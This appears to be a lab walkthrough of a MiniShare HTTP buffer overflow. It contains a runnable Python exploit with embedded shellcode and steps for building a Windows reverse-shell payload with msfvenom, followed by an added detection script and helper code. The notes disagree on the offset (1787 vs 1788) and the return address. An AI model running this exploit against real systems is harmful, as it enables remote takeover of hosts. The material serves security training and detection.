Fuzz the server, send a cyclic pattern, and read EIP: EIP is overwritten with 36684335.

[email protected]:~/attacker-framework/htb/minishare# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 36684335
[*] Exact match at offset 1787


# Proof-of-concept as written in the original notes (Python 2 string syntax), fixed up to run
# under Python 3: the repetition operators that were lost in extraction are restored and all
# literals are bytes so that s.send() accepts them. Usage: python3 exploit.py <target-ip>
import socket
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))

buff = b"GET "
buff += b"A" * 1787                 # padding up to the saved return address (offset 1787)
buff += b"\x4a\x75\xd7\x77"         # address of a jmp esp instruction from user32.dll, little-endian
buff += b"\x90" * 20                # 20 NOPs are added as a slide in front of the payload
buff += (b"\xdb\xde\xbd\x74\xf9\x07\x95\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
         b"\x53\x83\xc0\x04\x31\x68\x13\x03\x1c\xea\xe5\x60\x20\xe4\x68"
         b"\x8a\xd8\xf5\x0c\x02\x3d\xc4\x0c\x70\x36\x77\xbd\xf2\x1a\x74"
         b"\x36\x56\x8e\x0f\x3a\x7f\xa1\xb8\xf1\x59\x8c\x39\xa9\x9a\x8f"
         b"\xb9\xb0\xce\x6f\x83\x7a\x03\x6e\xc4\x67\xee\x22\x9d\xec\x5d"
         b"\xd2\xaa\xb9\x5d\x59\xe0\x2c\xe6\xbe\xb1\x4f\xc7\x11\xc9\x09"
         b"\xc7\x90\x1e\x22\x4e\x8a\x43\x0f\x18\x21\xb7\xfb\x9b\xe3\x89"
         b"\x04\x37\xca\x25\xf7\x49\x0b\x81\xe8\x3f\x65\xf1\x95\x47\xb2"
         b"\x8b\x41\xcd\x20\x2b\x01\x75\x8c\xcd\xc6\xe0\x47\xc1\xa3\x67"
         b"\x0f\xc6\x32\xab\x24\xf2\xbf\x4a\xea\x72\xfb\x68\x2e\xde\x5f"
         b"\x10\x77\xba\x0e\x2d\x67\x65\xee\x8b\xec\x88\xfb\xa1\xaf\xc4"
         b"\xc8\x8b\x4f\x15\x47\x9b\x3c\x27\xc8\x37\xaa\x0b\x81\x91\x2d"
         b"\x6b\xb8\x66\xa1\x92\x43\x97\xe8\x50\x17\xc7\x82\x71\x18\x8c"
         b"\x52\x7d\xcd\x39\x5a\xd8\xbe\x5f\xa7\x9a\x6e\xe0\x07\x73\x65"
         b"\xef\x78\x63\x86\x25\x11\x0c\x7b\xc6\x0c\x91\xf2\x20\x44\x39"
         b"\x53\xfa\xf0\xfb\x80\x33\x67\x03\xe3\x6b\x0f\x4c\xe5\xac\x30"
         b"\x4d\x23\x9b\xa6\xc6\x20\x1f\xd7\xd8\x6c\x37\x80\x4f\xfa\xd6"
         b"\xe3\xee\xfb\xf2\x93\x93\x6e\x99\x63\xdd\x92\x36\x34\x8a\x65"
         b"\x4f\xd0\x26\xdf\xf9\xc6\xba\xb9\xc2\x42\x61\x7a\xcc\x4b\xe4"
         b"\xc6\xea\x5b\x30\xc6\xb6\x0f\xec\x91\x60\xf9\x4a\x48\xc3\x53"
         b"\x05\x27\x8d\x33\xd0\x0b\x0e\x45\xdd\x41\xf8\xa9\x6c\x3c\xbd"
         b"\xd6\x41\xa8\x49\xaf\xbf\x48\xb5\x7a\x04\x78\xfc\x26\x2d\x11"
         b"\x59\xb3\x6f\x7c\x5a\x6e\xb3\x79\xd9\x9a\x4c\x7e\xc1\xef\x49"
         b"\x3a\x45\x1c\x20\x53\x20\x22\x97\x54\x61")
buff += b" HTTP/1.1\r\n\r\n"

s.send(buff)
s.close()
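Seen from the other side of the wire, the request above is easy to spot: a GET whose request-target is far longer than any path MiniShare serves, is full of non-printable bytes, and carries a run of 0x90 NOPs. The following checker is an added example, not code from the original notes or from MiniShare; it runs three constructed request lines (not captured traffic) through a few simple heuristics of the kind a reverse proxy or IDS rule in front of the server would apply. The 1024-byte URI threshold and the 8-byte NOP-run length are assumptions chosen for the example.

```python
import re

# Constructed sample request lines, shaped like what a reverse proxy or IDS in front
# of MiniShare would see; they are made up for this example, not captured traffic.
SAMPLES = [
    b"GET /index.html HTTP/1.1\r\n",
    b"GET /" + b"x" * 300 + b" HTTP/1.1\r\n",
    # shape of the overflow request: padding, return address, NOP slide, start of payload
    b"GET " + b"A" * 1787 + b"\x4a\x75\xd7\x77" + b"\x90" * 20 + b"\xdb\xde\xbd" + b" HTTP/1.1\r\n",
]

MAX_URI_LEN = 1024                         # assumption: no legitimate MiniShare URI is this long
MIN_NOP_RUN = 8                            # assumption: 8+ consecutive 0x90 bytes is a NOP slide
PRINTABLE = frozenset(range(0x21, 0x7f))   # printable ASCII, excluding the space separator


def request_uri(line: bytes) -> bytes:
    """Extract the request-target from a raw request line without assuming it is well formed."""
    line = line.rstrip(b"\r\n")
    _method, _, rest = line.partition(b" ")
    uri, sep, version = rest.rpartition(b" ")
    if sep and version.startswith(b"HTTP/"):
        return uri
    return rest  # no version field: treat everything after the method as the URI


def inspect_request_line(line: bytes) -> list:
    """Return the reasons a request line looks like an overflow attempt (empty list = benign)."""
    uri = request_uri(line)
    reasons = []
    if len(uri) > MAX_URI_LEN:
        reasons.append("uri-too-long")
    if any(b not in PRINTABLE for b in uri):
        reasons.append("non-printable-bytes")
    if re.search(rb"\x90{%d,}" % MIN_NOP_RUN, uri):
        reasons.append("nop-sled")
    return reasons


def scan(lines):
    """Run every line through inspect_request_line and keep only the suspicious ones."""
    return [(i, r) for i, l in enumerate(lines) for r in [inspect_request_line(l)] if r]


if __name__ == "__main__":
    for idx, why in scan(SAMPLES):
        print(f"sample {idx}: {', '.join(why)}")
```

Only the third sample trips the checks, and it trips all three at once; the 300-byte path in the second sample stays below the length threshold and contains nothing but printable bytes, which is the kind of benign long URI a rule must not flag. In practice the length check alone already catches this exploit, because the overflow needs 1787 bytes of padding before EIP is even reached.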
Procedure, step by step:

1. Run the MiniShare server on the Windows machine.
2. Fuzz the application until it crashes; it crashed at 2000 bytes.
3. Find the exact offset: create a pattern with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000, send it with the Python code, and read the EIP value: 43366843.
4. Look up that value: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 43366843 reports offset 1788.
5. Run the code again with this offset and check whether the application still crashes.
6. After the crash, check for bad characters: follow ESP in the dump and remove each bad character found. Bad characters: \x00\x0d.
7. Find a JMP ESP address with mona: !mona modules, then pick a module with DEP and ASLR both False; otherwise use !mona find -s "\xff\xe4" -m user32.dll. Take the first result and reverse its bytes: 7603B503 (address as shown in the mona results) becomes \x03\xB5\x03\x76 (how it looks in the final exploit).
8. Generate the shellcode: msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=ip LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0d' -f python
9. Add the shellcode to the Python code, keeping the buffer layout: buffer += "A" * 1788 + "\x03\xB5\x03\x76" + "C" * 16 + buf
10. Run it: boom.
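The three mechanical parts of steps 3, 4, 6 and 7 (turning a crash value into an offset, turning a mona address into the bytes that go in the buffer, and checking a payload for the bad characters) are small enough to reimplement, which makes it clear what the tools are actually doing. The block below is an added example, not code from the original notes or from the Metasploit project; pattern_create follows the same character-set order as pattern_create.rb (digit fastest, then lower-case, then upper-case letter), so the two EIP values recorded above resolve to the offsets the notes report, 1787 and 1788. The helper names are the author's own choice for this example.

```python
import string
import struct

# Character sets used by Metasploit's pattern_create.rb: the digit advances fastest,
# then the lower-case letter, then the upper-case letter (Aa0Aa1...Aa9Ab0...).
UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length: int) -> str:
    """Cyclic pattern of the given length; every 3-byte window is unique up to 20280 bytes."""
    triples = (u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    out, size = [], 0
    for t in triples:
        out.append(t)
        size += 3
        if size >= length:
            break
    return "".join(out)[:length]


def pattern_offset(eip_hex: str, length: int) -> int:
    """Offset of the 4 pattern bytes that landed in EIP, or -1 if they are not in the pattern.

    The debugger shows EIP as a 32-bit little-endian value, so its bytes appear reversed
    relative to the order they had in the buffer; undo that before searching the pattern.
    """
    needle = bytes.fromhex(eip_hex)[::-1].decode("ascii")
    return pattern_create(length).find(needle)


def little_endian(address_hex: str) -> bytes:
    """Turn an address as printed by mona (7603B503) into the bytes written into the buffer."""
    return struct.pack("<I", int(address_hex, 16))


def find_bad_chars(payload: bytes, bad: bytes = b"\x00\x0d") -> list:
    """Report which of the known bad characters a payload still contains (empty = clean)."""
    return sorted(b for b in set(bad) if b in payload)


if __name__ == "__main__":
    # The two crash values recorded in the notes, resolved against a 2000-byte pattern.
    for eip in ("36684335", "43366843"):
        print(eip, "->", pattern_offset(eip, 2000))
    print(little_endian("7603B503"))                     # b'\x03\xb5\x03v'
    print(find_bad_chars(b"\x41\x00\x42\x0d\x43"))       # [0, 13]: payload still needs encoding
```

Running find_bad_chars over the msfvenom output before it goes into the buffer is the check that step 6 is really about: if the list is not empty, the encoder did not honour the -b list and the payload will be truncated or corrupted at the first such byte.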